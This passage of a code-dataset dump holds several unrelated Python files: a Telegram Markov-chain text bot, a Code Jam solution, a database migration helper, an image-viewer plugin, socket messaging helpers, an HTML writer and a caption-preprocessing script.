requests.get(self.api_url + method, params)\n        print('send photo:', resp)\n\n    def delete_webhook(self):\n        method = 'deleteWebhook'\n        requests.post(self.api_url + method)\n        logging.warning(\"Webhook deleted\")\n\n\nclass Message:\n    def __init__(self, data):\n        self.chat_id = self.get(data, [\"message\", \"chat\", \"id\"])\n        self.from_id = self.get(data, [\"message\", \"from\", \"id\"])\n        self.text = self.get(data, [\"message\", \"text\"])\n        self.reply_id = self.get(data, [\"message\", \"reply_to_message\", \"from\", \"id\"])\n\n    @staticmethod\n    def get(data, keys):\n        if data.__contains__(keys[0]):\n            first = keys[0]\n            if len(keys) == 1:\n                return data[first]\n            else:\n                keys.pop(0)\n                return Message.get(data[first], keys)\n        else:\n            return None\n\n\nend = \"*END*\"\n\n\nclass Analyzer:\n    owner_id = 433518097\n\n    def __init__(self):\n        self.persons = list()\n\n    def analyze(self, data):\n        message = Message(data)\n        if (message.from_id == self.owner_id) and (message.reply_id is not None) and (message.chat_id is not None):\n            self.say(message.chat_id, self.owner_id, message.text)\n            return\n        if (message.from_id == self.owner_id) and (message.text is not None):\n            if message.text == \"Log\":\n                print(self)\n                return\n            if message.text == \"Save\":\n                self.save()\n                print(\"Saved\")\n                if message.chat_id is not None:\n                    self.bot_send_message(message.chat_id, \"Saved\")\n                return\n            if message.text == \"Load\":\n                self.load()\n                print(\"Loaded\")\n                if message.chat_id is not None:\n                    self.bot_send_message(message.chat_id, \"Loaded\")\n                return\n            if message.text == \"Clean\":\n                self.clean()\n                print(\"Cleaned\")\n                if message.chat_id is not None:\n                    self.bot_send_message(message.chat_id, \"Cleaned\")\n                return\n            if message.text == \"Voice messages?\":\n                if message.chat_id is not None:\n                    self.bot_send_message(message.chat_id, \"And how exactly am I supposed to listen to these voice messages?\")\n                return\n        if (message.from_id is not None) and (message.text is not None):\n            if message.text.startswith(\"Generate \"):\n                self.say(message.chat_id, message.from_id, message.text[9:])\n                return\n            self.add(message.from_id, message.text)\n            return\n\n    def add(self, person, text):\n        if person not in self.persons:\n            self.persons.append(Person(person))\n        index = self.persons.index(person)\n        self.persons[index].add(text)\n\n    def generate(self, person, count):\n        if not self.persons.__contains__(person):\n            return \"No data about this person\"\n        index = self.persons.index(person)\n        return self.persons[index].generate(count)\n\n    def say(self, chat, person, count):\n        count = self.try_int(count)\n        if count is None:\n            print(\"Invalid count\")\n            self.bot_send_message(chat, \"Invalid count\")\n            return\n        text = self.generate(person, count)\n        self.bot_send_message(chat, text)\n        print(\"Generated text with length\", count, \" by person \", person)\n\n    def save(self):\n        pickle.dump(self.persons, open('data.bot', 'wb'), protocol=pickle.HIGHEST_PROTOCOL)\n\n    def load(self):\n        self.persons = pickle.load(open('data.bot', 'rb'))\n\n    def clean(self):\n        self.persons = list()\n\n    @staticmethod\n    def bot_send_message(chat_id, text):\n        bot.send_message(chat_id, text)\n\n    @staticmethod\n    def try_int(value):\n        try:\n            return int(value)\n        except ValueError:\n            return None\n\n    def __repr__(self):\n        return self.persons.__repr__()
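\n\n# (Editorial note) Person below builds a first-order Markov chain over words:\n# self.dictionary maps each word to a Chain of observed successor words, and\n# the *END* sentinel marks sentence boundaries for the Generator.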
\n\nclass Person:\n    def __init__(self, uid):\n        self.uid = uid\n        self.dictionary = dict()\n        self.generator = None\n\n    def __gt__(self, other):\n        return self.uid > other\n\n    def __eq__(self, other):\n        return self.uid == other\n\n    def add(self, text):\n        self.generator = None\n\n        r = re.compile(\"[а-яА-Я.]+\")\n        text = text.lower() + \".\"\n        words = list()\n        for w in filter(r.match, text.split()):\n            word = w.translate(str.maketrans('', '', string.punctuation))\n            if len(w) > 0:\n                words.append(word)\n            if w.__contains__('.') or w.__contains__(','):\n                words.append(end)\n        print(words)\n\n        if len(words) == 0:\n            return\n        last = end\n        for word in words:\n            if last not in self.dictionary:\n                self.dictionary[last] = Chain()\n            self.dictionary[last].add(word)\n            last = word\n\n    def generate(self, count):\n        if self.generator is None:\n            self.generator = Generator()\n            for word, chain in self.dictionary.items():\n                self.generator.add(word, chain)\n        return self.generator.generate(count)\n\n    def __repr__(self):\n        return \"\\n\" + str(self.uid) + \": \" + self.dictionary.__repr__()\n\n\nclass Chain:\n    def __init__(self):\n        self.continuation = dict()\n\n    def add(self, text):\n        if text not in self.continuation:\n            self.continuation[text] = 0\n        self.continuation[text] += 1\n\n    def get(self):\n        return self.continuation\n\n    def __repr__(self):\n        return self.continuation.__repr__()\n\n\nclass Generator:\n    def __init__(self):\n        self.next = dict()\n\n    def add(self, word, chain):\n        words = [word for word in chain.get()]\n        
self.next[word] = words\n\n def generate(self, count):\n def sentence_end():\n nonlocal capitalize\n endings = [('. ', 100, True), ('! ', 20, True), ('\\n', 75, True), (', ', 150, False), (' ', 85, False)]\n s = sum([ending[1] for ending in endings])\n r = int(random_generator.random() * s)\n s = 0\n for ending in endings:\n char, probability, capital = ending\n s += probability\n if s >= r:\n capitalize = capital\n return char\n punctuations = ['.', '!', ',', '\\n', ' ']\n text = ''\n word = end\n i = 0\n capitalize = True\n while True:\n size = len(self.next[word])\n rand = int(random_generator.random() * size)\n word = self.next[word][rand]\n if word == end:\n text = text[:-1] + sentence_end()\n if i >= count:\n break\n else:\n w = word\n if capitalize:\n w = word.title()\n capitalize = False\n text += w + ' '\n i += 1\n while text[-1:] in punctuations:\n text = text[:-1]\n return text\n\n\ndef get_token(name):\n config_file_name = 'config.json'\n try:\n if os.path.isfile(config_file_name):\n with open(config_file_name) as config_file:\n config = json.load(config_file)\n if config.__contains__(name):\n return config[name]\n else:\n print(\"CRITICAL: cannot get token in config file \" + name)\n logging.critical(\"Cannot get token in config file \" + name)\n else:\n if os.environ.__contains__(name):\n return os.environ[name]\n else:\n print(\"CRITICAL: cannot get token in OS environment \" + name)\n logging.critical(\"Cannot get token in OS environment \" + name)\n except Exception as error:\n print(\"CRITICAL: cannot get token, reason: \" + error.__str__())\n logging.critical(\"Cannot get token, reason: \" + error.__str__())\n\n\nbot = BotHandler(get_token(\"TELEGRAM_BOT_TOKEN\"))\nrandom_generator = random.Random()\n\n\ndef main():\n logging.basicConfig(filename=\"logs.log\", level=logging.INFO)\n offset = None\n\n analyzer = Analyzer()\n analyzer.load()\n\n while True:\n bot.get_updates(offset)\n data = bot.get_last_update()\n if data == '':\n continue\n last_update_id = data['update_id']\n offset = last_update_id + 1\n\n logging.info(data)\n analyzer.analyze(data)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n exit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423276894","text":"#!/usr/bin/env python3\n\n# ZERO -> Z\n# SIX -> X\n# TWO -> W\n# SEVEN -> S\n# EIGHT -> G\n# FIVE -> V\n# THREE -> H\n# FOUR -> U\n# ONE -> O\n# NINE -> I\n\nnumbers = [\n (0, 'Z', 'ZERO'),\n (6, 'X', 'SIX'),\n (2, 'W', 'TWO'),\n (7, 'S', 'SEVEN'),\n (8, 'G', 'EIGHT'),\n (5, 'V', 'FIVE'),\n (3, 'H', 'THREE'),\n (4, 'U', 'FOUR'),\n (1, 'O', 'ONE'),\n (9, 'I', 'NINE'),\n]\n\ndef remove_word(counts, word):\n for letter in word:\n counts[letter] -= 1\n\nT = int(input())\nfor t in range(T):\n word = input()\n counts = {}\n for letter in word:\n if letter in counts:\n counts[letter] += 1\n else:\n counts[letter] = 1\n digit_counts = {}\n for digit, letter, word in numbers:\n count = 0\n while letter in counts and counts[letter]:\n remove_word(counts, word)\n count += 1\n digit_counts[digit] = count\n for v in counts.values():\n assert v == 0\n answer = ''\n for digit in range(10):\n answer += str(digit) * digit_counts[digit]\n print('Case #{}: {}'.format(t+1, 
answer))\n","sub_path":"solutions_5648941810974720_1/Python/k21/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"350840976","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"Module contains utils for external CADs.\"\"\"\n\nimport sqlalchemy as sa\n\nfrom ggrc.migrations import utils\n\n\nCADS_BY_OBJECT_TYPE_SQL = u'''\n SELECT\n id,\n definition_type,\n attribute_type,\n multi_choice_options,\n mandatory,\n helptext,\n placeholder,\n context_id,\n updated_at,\n modified_by_id,\n created_at,\n title\n FROM\n custom_attribute_definitions\n WHERE\n definition_type = :object_type\n'''\n\nPROPAGATE_EXTERNAL_CADS_BY_CADS_SQL = u'''\n INSERT INTO external_custom_attribute_definitions (\n id,\n definition_type,\n attribute_type,\n multi_choice_options,\n mandatory,\n helptext,\n placeholder,\n context_id,\n updated_at,\n modified_by_id,\n created_at,\n title\n ) VALUES (\n :id,\n :definition_type,\n :attribute_type,\n :multi_choice_options,\n :mandatory,\n :helptext,\n :placeholder,\n :context_id,\n :updated_at,\n :modified_by_id,\n :created_at,\n :title\n )\n'''\n\n\ndef _get_cads(connection, object_type):\n \"\"\"Returns CADs by object type.\n\n Args:\n connection: sqlalchemy.engine.Connection object.\n object_type: String representation of object type.\n\n Returns:\n cads: List of CADs objects.\n \"\"\"\n cads = connection.execute(\n sa.text(CADS_BY_OBJECT_TYPE_SQL),\n object_type=object_type\n ).fetchall()\n\n return cads\n\n\ndef _propagate_external_cads(connection, cads):\n \"\"\"Propagates external CADs by CADs.\n\n Args:\n connection: sqlalchemy.engine.Connection object.\n cads: List of CADs objects.\n \"\"\"\n for cad in cads:\n connection.execute(\n sa.text(PROPAGATE_EXTERNAL_CADS_BY_CADS_SQL),\n definition_type=cad.definition_type,\n attribute_type=cad.attribute_type,\n multi_choice_options=cad.multi_choice_options,\n mandatory=cad.mandatory,\n helptext=cad.helptext,\n placeholder=cad.placeholder,\n context_id=cad.context_id,\n updated_at=cad.updated_at,\n modified_by_id=cad.modified_by_id,\n created_at=cad.created_at,\n title=cad.title,\n id=cad.id\n )\n\n\ndef _add_revisions(connection, cads):\n \"\"\"Adds CADs to objects without revisions.\n\n Args:\n connection: sqlalchemy.engine.Connection object.\n cads: List of CADs objects.\n \"\"\"\n cad_ids = [cad.id for cad in cads]\n utils.add_to_objects_without_revisions_bulk(\n connection,\n cad_ids,\n \"ExternalCustomAttributeDefinition\",\n \"created\"\n )\n\n\ndef migrate_to_external_cads(connection, obj_type):\n \"\"\"Migrates CADs to external CADs for object type.\n\n Args:\n connection: An instance of SQLAlchemy connection.\n obj_type: String representation of object type.\n \"\"\"\n cads = _get_cads(connection, obj_type)\n _propagate_external_cads(connection, cads)\n _add_revisions(connection, cads)\n","sub_path":"src/ggrc/migrations/utils/external_cads.py","file_name":"external_cads.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"490031692","text":"\n\"\"\"\nRead sparse points from a text file.\n\nThe sparse points file makes it possible to load individual point data into the 3D space defined \nthe volume image. \n\nThe sparse points file may have one of two formats.\nIn both cases it's one row per data point. 
\nThere is no header that contains information on what the columns are.\n\nONE:\nz_position,x_position,y_position\\n\nz_position,x_position,y_position\\n\n...\n\n\nTWO\nz_position,x_position,y_position,data_series_number\\n\nz_position,x_position,y_position,data_series_number\\n\n...\n\n\nIn the second format, each data point is associated with a scalar value.\nAll points with the same scalar value are grouped together as one ingredient. \nThis allows points of different sorts to be overlaid easily on the same \nimage and have their properties changed together. \n\n\n\"\"\"\n\n\nimport os\nfrom lasagna_plugin import lasagna_plugin\nfrom elastix_io import read_pts_file\nimport numpy as np\nfrom PyQt5 import QtGui\n\n\nclass loaderClass(lasagna_plugin):\n def __init__(self,lasagna):\n super(loaderClass,self).__init__(lasagna)\n\n self.lasagna = lasagna\n self.objectName = 'sparse_point_reader'\n self.kind = 'sparsepoints'\n # Construct the QActions and other stuff required to integrate the load dialog into the menu\n self.loadAction = QtGui.QAction(self.lasagna) # Instantiate the menu action\n\n # Add an icon to the action\n iconLoadOverlay = QtGui.QIcon()\n iconLoadOverlay.addPixmap(QtGui.QPixmap(\":/actions/icons/points.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.loadAction.setIcon(iconLoadOverlay)\n\n # Insert the action into the menu\n self.loadAction.setObjectName(\"sparsePointRead\")\n self.lasagna.menuLoad_ingredient.addAction(self.loadAction)\n self.loadAction.setText(\"Sparse point read\")\n\n self.loadAction.triggered.connect(self.showLoadDialog) # Link the action to the slot\n\n # Slots follow\n\n def showLoadDialog(self, fname=None):\n \"\"\"\n This slot brings up the load dialog and retrieves the file name.\n If a filename is provided then this is loaded and no dialog is brought up.\n If the file name is valid, it loads the base stack using the load method.\n\n \"\"\"\n \n if fname is None or fname is False:\n fname = self.lasagna.showFileLoadDialog(fileFilter=\"Text Files (*.txt *.csv *.pts)\")\n\n if fname is None or fname is False:\n return\n\n if os.path.isfile(fname):\n if fname.endswith('.pts'):\n data, roi_type = read_pts_file(fname)\n if roi_type == 'point':\n print('!!! WARNING points are set in real world coordinates. I assume a pixel size of 1')\n else:\n with open(str(fname), 'r') as fid:\n contents = fid.read()\n\n # a list of strings with each string being one line from the file\n asList = contents.split('\\n')\n data = []\n for ii in range(len(asList)):\n if len(asList[ii]) == 0:\n continue\n data.append([float(x) for x in asList[ii].split(',')])\n\n # A point series should be a list of lists where each list has a length of 3,\n # corresponding to the position of each point in 3D space. However, point\n # series could also have a length of 4. If this is the case, the fourth \n # value is the index of the series. This allows a single file to hold multiple\n # different point series. We handle these two cases differently. 
First we deal\n # with the the standard case:\n if len(data[0]) == 3:\n # Create an ingredient with the same name as the file name \n objName = fname.split(os.path.sep)[-1]\n self.lasagna.addIngredient(objectName=objName,\n kind=self.kind,\n data=np.asarray(data),\n fname=fname\n )\n # Add this ingredient to all three plots\n self.lasagna.returnIngredientByName(objName).addToPlots() \n # Update the plots\n self.lasagna.initialiseAxes()\n\n elif len(data[0]) == 4:\n # What are the unique data series values?\n dSeries = [x[3] for x in data]\n dSeries = list(set(dSeries))\n \n # Loop through these unique series and add as separate sparse point objects\n\n for thisIndex in dSeries:\n tmp = []\n for thisRow in data:\n if thisRow[3] == thisIndex:\n tmp.append(thisRow[:3])\n\n print(\"Adding point series %d with %d points\" % (thisIndex,len(tmp)))\n\n # Create an ingredient with the same name as the file name \n objName = \"%s #%d\" % (fname.split(os.path.sep)[-1],thisIndex)\n\n self.lasagna.addIngredient(objectName=objName,\n kind=self.kind,\n data=np.asarray(tmp),\n fname=fname\n )\n\n # Add this ingredient to all three plots\n self.lasagna.returnIngredientByName(objName).addToPlots() \n\n # Update the plots\n self.lasagna.initialiseAxes()\n\n else:\n print((\"Point series has %d columns. Only 3 or 4 columns are supported\" % len(data[1])))\n\n else:\n self.lasagna.statusBar.showMessage(\"Unable to find \" + str(fname))\n","sub_path":"IO/sparse_point_reader_plugin.py","file_name":"sparse_point_reader_plugin.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53069451","text":"import shutil\nimport socket\nimport json\nimport time\nimport sys\nimport sh\n\n# For TCP messaging\n# Where message_dict is something like {\"message_type\": \"heartbeat\", \"worker_pid\": 3}\ndef send_message(message_dict, host, port_to_send_to):\n\t'''\n\tprint('\\n==========================================================')\n\tprint('[TCP] Attempting to send message to [HOST: {} PORT: {}]'.format(host, port_to_send_to))\n\tprint('==========================================================\\n')\n\t'''\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((host, port_to_send_to))\n\tdata = json.dumps(message_dict)\n\ts.sendall(data.encode(\"utf-8\"))\n\ts.close()\n\n# For TCP listening\n# Has a worker or master listen for messages and then act on each received message\n# via the handle_message function\ndef listen_and_act_helper(handle_message, host, port_to_listen_on, agent=False):\n\t'''\n\tprint('\\n==========================================================')\n\tprint('[TCP] Attempting to listen in on [HOST: {} PORT: {}]'.format(host, port_to_listen_on))\n\tprint('==========================================================\\n')\n\t'''\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.bind((host, port_to_listen_on))\n\ts.listen(5)\n\n\t# Worker needs to register here in order to avoid a race condition.\n\t# If master is calling this function, agent defaults to False, and\n\t# this will be skipped\n\tif agent:\n\t\tagent.register()\n\n\twhile True:\n\t\tclientsocket, address = s.accept()\n\t\tmax_data = 1024\n\n\t\twhile True:\n\t\t\tmessage = clientsocket.recv(max_data).decode('utf-8')\n\t\t\tmessage_dict = json.loads(message) # Convert string to dict\n\t\t\thandle_message(message_dict)\n\n\t\t\tif len(message) != max_data:\n\t\t\t\tbreak\n\n\t\tclientsocket.close()\n\n# For UDP 
messaging\ndef udp_send_message(message_dict, host, port_to_send_to):\n\t'''\n\tprint('\\n==========================================================')\n\tprint('[UDP] Attempting to send datagram to [HOST: {} PORT: {}]'.format(host, port_to_send_to))\n\tprint('==========================================================\\n')\n\t'''\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\tdata = json.dumps(message_dict)\n\ts.sendto(bytes(data.encode(\"utf-8\")), (host, port_to_send_to))\n\n# For UDP listening\n# Has master listen for messages and then act on each received message via the handle_message function\ndef udp_listen_and_act(handle_message, host, port_to_listen_on):\n\tprint('\\n==========================================================')\n\tprint('[UDP] Attempting to listen in on [HOST: {} PORT: {}]'.format(host, port_to_listen_on))\n\tprint('==========================================================\\n')\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ts.bind((\"\", port_to_listen_on))\n\twhile True:\n\t\tdata, addr = s.recvfrom(1024)\n\t\tmessage = data.decode('utf-8') # Message is sent as byte string; must be decoded\n\t\tmessage_dict = json.loads(message) # Convert string to dict\n\t\thandle_message(message_dict)\n\n# Returns the port the master lives on and the server's host address\ndef assign_host_and_ports():\n\thost = \"localhost\"\n\tudp_port = 8000 # Change to 1 for autograder submission; 8000 for local testing\n\tprint('\\n\\n\\===================================================================================')\n\tprint('Setting UDP port to {}. Needs to be set to 1 for submission, 8000 for local testing'.format(udp_port))\n\tprint('===================================================================================\\n\\n')\n\treturn host, udp_port\n\n# Merge input files into one output file\ndef merge_files(input_files, output_file):\n\twith open(output_file, 'a+') as outfile:\n\t\t# message['input_file'] is a list of input files, so we have to loop thru each one\n\t\tfor input_file in input_files:\n\t\t\twith open(input_file) as infile:\n\t\t\t\tshutil.copyfileobj(infile, outfile)\n\ndef prepend_input_dir(files, input_dir):\n\tif input_dir[-1] == '/':\n\t\tfiles = [input_dir + file for file in files]\n\telse: \n\t\tfiles = [input_dir + '/' + file for file in files]\n\treturn files","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308050925","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-intel/egg/cpip/CppCondGraphToHtml.py\n# Compiled at: 2017-10-03 13:07:16\n\"\"\"Writes out the Cpp Conditional processing graph as HTML.\"\"\"\n__author__ = 'Paul Ross'\n__date__ = '2011-07-10'\n__rights__ = 'Copyright (c) 2008-2017 Paul Ross'\nimport os, cpip\nfrom cpip.core import CppCond\nfrom cpip.util import XmlWrite\nfrom cpip.util import HtmlUtils\nfrom cpip import TokenCss\n\ndef linkToIndex(theS, theIdxPath):\n with XmlWrite.Element(theS, 'p'):\n theS.characters('Return to ')\n with XmlWrite.Element(theS, 'a', {'href': theIdxPath}):\n theS.characters('Index')\n\n\nclass CcgVisitorToHtml(CppCond.CppCondGraphVisitorBase):\n \"\"\"Writing CppCondGraph visitor object.\"\"\"\n PAD_STR = ' '\n\n def __init__(self, theHtmlStream):\n \"\"\"Constructor with an output XmlWrite.XhtmlStream 
and\n a TuIndexer.TuIndexer object.\"\"\"\n super(CcgVisitorToHtml, self).__init__()\n self._hs = theHtmlStream\n\n def visitPre(self, theCcgNode, theDepth):\n \"\"\"Pre-traversal call with a CppCondGraphNode and the integer depth in\n the tree.\"\"\"\n self._hs.characters(self.PAD_STR * theDepth)\n if theCcgNode.state:\n myCssClass = 'CcgNodeTrue'\n else:\n myCssClass = 'CcgNodeFalse'\n with XmlWrite.Element(self._hs, 'span', {'class': myCssClass}):\n self._hs.characters('#%s' % theCcgNode.cppDirective)\n if theCcgNode.constExpr is not None:\n self._hs.characters(' %s' % theCcgNode.constExpr)\n self._hs.characters(' ')\n self._hs.characters(' /* ')\n HtmlUtils.writeHtmlFileLink(self._hs, theCcgNode.fileId, theCcgNode.lineNum, os.path.basename(theCcgNode.fileId), theClass=None)\n self._hs.characters(' */')\n self._hs.characters('\\n')\n return\n\n def visitPost(self, theCcgNode, theDepth):\n \"\"\"Post-traversal call with a CppCondGraphNode and the integer depth in\n the tree.\"\"\"\n pass\n\n\ndef processCppCondGrphToHtml(theLex, theHtmlPath, theTitle, theIdxPath):\n \"\"\"Given the PpLexer write out the Cpp Cond Graph to the HTML file.\n theLex is a PpLexer.\n theHtmlPath is the file path of the output.\n theTitle is the page title.\n theIdxPath is the file name of the index page.\n theTuIndexer is a TuIndexer.TuIndexer object.\"\"\"\n if not os.path.exists(os.path.dirname(theHtmlPath)):\n os.makedirs(os.path.dirname(theHtmlPath))\n with XmlWrite.XhtmlStream(theHtmlPath, mustIndent=cpip.INDENT_ML) as (myS):\n with XmlWrite.Element(myS, 'head'):\n with XmlWrite.Element(myS, 'link', {'href': TokenCss.TT_CSS_FILE, \n 'type': 'text/css', \n 'rel': 'stylesheet'}):\n pass\n with XmlWrite.Element(myS, 'title'):\n myS.characters(theTitle)\n with XmlWrite.Element(myS, 'body'):\n with XmlWrite.Element(myS, 'h1'):\n myS.characters('Preprocessing Conditional Compilation Graph: %s' % theLex.tuFileId)\n with XmlWrite.Element(myS, 'p'):\n myS.characters('The conditional compilation statements as green (i.e. evaluates as True)\\nand red (evaluates as False). 
Each statement is linked to the source code it came from.\\n')\n linkToIndex(myS, theIdxPath)\n with XmlWrite.Element(myS, 'pre'):\n myVisitor = CcgVisitorToHtml(myS)\n theLex.condCompGraph.visit(myVisitor)","sub_path":"pycfiles/cpip-0.9.7-py2.7/CppCondGraphToHtml.py","file_name":"CppCondGraphToHtml.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"23895407","text":"import string\nimport glob\nimport pickle as pickle\nimport common_functions as common_functions\n\n\ndef read_descriptions_file(document):\n\timage_description_mappings = dict()\n\tfor line in document.split('\\n'):\n\t\ttokens = line.split()\n\t\tif len(line) < 2:\n\t\t\tcontinue\n\t\tid, descriptions = tokens[0], tokens[1:]\n\t\tid = id.split('.')[0]\n\t\tdescriptions = ' '.join(descriptions)\n\t\tif id not in image_description_mappings:\n\t\t\timage_description_mappings[id] = list()\n\t\timage_description_mappings[id].append(descriptions)\n\treturn image_description_mappings\n\n\ndef clean_description_data(descriptions):\n\t# Replace all punctuations to empty character\n\tremove_punctuation = str.maketrans('', '', string.punctuation)\n\tfor key, list_of_descriptions in descriptions.items():\n\t\tfor i in range(len(list_of_descriptions)):\n\t\t\tdescription = list_of_descriptions[i]\n\t\t\tdescription = description.split()\n\t\t\t# convert all the words to lowercase\n\t\t\tdescription = [word.lower() for word in description]\n\t\t\t# Remove all punctuations\n\t\t\tdescription = [w.translate(remove_punctuation) for w in description]\n\t\t\t# Remove any word whose length is less than 1\n\t\t\tdescription = [word for word in description if len(word)>1]\n\t\t\t# Remove any word whose conetents are not alphabets\n\t\t\tdescription = [word for word in description if word.isalpha()]\n\t\t\tlist_of_descriptions[i] = ' '.join(description)\n\n\n\n# save the descriptions to a text file\ndef save_to_file(descriptions, filename):\n\tlines_in_file = list()\n\tfor key, descriptions_list in descriptions.items():\n\t\tfor desc in descriptions_list:\n\t\t\tlines_in_file.append(key + ' ' + desc)\n\tdescriptions_data = '\\n'.join(lines_in_file)\n\twith open(filename, 'w') as f:\n\t\tf.write(descriptions_data)\n\n\n# load a pre-defined list of image file names\ndef load_set(filename):\n\tdocument = common_functions.read_document(filename)\n\tlist_of_file_names = list()\n\tfor line in document.split('\\n'):\n\t\tif len(line) >= 1:\n\t\t\t# get the image name\n\t\t\timage_name = line.split('.')[0]\n\t\t\tlist_of_file_names.append(image_name)\n\treturn set(list_of_file_names)\n\n\n# load the descriptions from file into memory\ndef load_clean_descriptions(filename, dataset):\n\tdoc = common_functions.read_document(filename)\n\tdescriptions = dict()\n\tfor line in doc.split('\\n'):\n\t\ttokens_in_each_line = line.split()\n\t\tid, description = tokens_in_each_line[0], tokens_in_each_line[1:]\n\t\tif id in dataset:\n\t\t\tif id not in descriptions:\n\t\t\t\tdescriptions[id] = list()\n\t\t\tdescription = 'captStrt ' + ' '.join(description) + ' captEnd'\n\t\t\tdescriptions[id].append(description)\n\treturn descriptions\n\n\n# convert a dictionary of clean descriptions to a list of descriptions\ndef to_lines(descriptions):\n\tall_desc = list()\n\tfor key in descriptions.keys():\n\t\t[all_desc.append(d) for d in descriptions[key]]\n\treturn all_desc\n\n\n# calculate the length of the description with the most words\ndef 
get_max_length(descriptions):\n\tall_descriptions = list()\n\tfor key in descriptions.keys():\n\t\t[all_descriptions.append(d) for d in descriptions[key]]\n\treturn max(len(d.split()) for d in all_descriptions)\n\n\ndef pre_process_captions(class_name):\n\tif class_name == \"general\":\n\t\tfilename = \"Dataset/general_captions/Flickr8k.token.txt\"\n\t\tdocument = common_functions.read_document(filename)\n\t\tprint(document[:300])\n\n\t\tdescriptions = read_descriptions_file(document)\n\n\t\tclean_description_data(descriptions)\n\n\t\tsave_to_file(descriptions, 'Descriptions/' + class_name + '_' + 'descriptions.txt')\n\n\t\tfilename = 'Dataset/general_captions/Flickr_8k.trainImages.txt'\n\t\ttrain = load_set(filename)\n\t\tprint('Loading the training Dataset: %d' % len(train))\n\n\t\timages_path = 'Dataset/general_images/'\n\t\tlist_of_images = glob.glob(images_path + '*.jpg')\n\n\t\ttrain_images_file = 'Dataset/general_captions/Flickr_8k.trainImages.txt'\n\t\t# Read the train image names in a set\n\t\ttrain_images = set(open(train_images_file, 'r').read().strip().split('\\n'))\n\n\t\t# this contains all the training images\n\t\ttrain_img = []\n\n\t\tfor i in list_of_images: # img is list of full path names of all images\n\t\t\tif i[len(images_path):] in train_images: # Check if the image belongs to training set\n\t\t\t\ttrain_img.append(i) # Add it to the list of train images\n\n\t\t# descriptions\n\t\ttrain_descriptions = load_clean_descriptions(\"Descriptions/\"+class_name+'_descriptions.txt', train)\n\t\tprint('Descriptions: train=%d' % len(train_descriptions))\n\n\t\t# Create a list of all the training captions\n\t\ttraining_captions = []\n\t\tfor key, value in train_descriptions.items():\n\t\t\tfor caption in value:\n\t\t\t\ttraining_captions.append(caption)\n\t\tlen(training_captions)\n\n\t\t# Pick words that occur more than 10 times.\n\t\tword_count_threshold = 10\n\t\tword_counts = {}\n\t\tsentence_count = 0\n\t\tfor sentence in training_captions:\n\t\t\tsentence_count += 1\n\t\t\tfor w in sentence.split(' '):\n\t\t\t\tword_counts[w] = word_counts.get(w, 0) + 1\n\n\t\tvocabulary = [w for w in word_counts if word_counts[w] >= word_count_threshold]\n\n\t\tindex_to_word = {}\n\t\tword_to_index = {}\n\n\t\tindex = 1\n\t\tfor w in vocabulary:\n\t\t\tword_to_index[w] = index\n\t\t\tindex_to_word[index] = w\n\t\t\tindex += 1\n\n\t\tvocab_size = len(index_to_word) + 1 # one for appended 0's\n\n\t\tmax_length = get_max_length(train_descriptions)\n\t\tprint('Max Description Length Length: ', max_length)\n\n\t\twith open(\"Pickle/general_wordtoix.pkl\", \"wb\") as encoded_pickle:\n\t\t\tpickle.dump(word_to_index, encoded_pickle)\n\n\t\twith open(\"Pickle/general_ixtoword.pkl\", \"wb\") as encoded_pickle:\n\t\t\tpickle.dump(index_to_word, encoded_pickle)\n\n\t\twith open(\"Pickle/general_max_length.pkl\", \"wb\") as encoded_pickle:\n\t\t\tpickle.dump(max_length, encoded_pickle)\n\n\t\treturn max_length, vocab_size, train_descriptions, train_img, word_to_index\n\n\n\n\n\n","sub_path":"pre_processing_caption.py","file_name":"pre_processing_caption.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"284578785","text":"from __future__ import unicode_literals\n\nimport errno\nimport logging\nimport os\nimport shutil\nimport stat\n\nimport nanotime\nfrom shortuuid import uuid\n\nfrom dvc.exceptions import DvcException\nfrom dvc.system import System\nfrom dvc.utils import dict_md5\nfrom dvc.utils import 
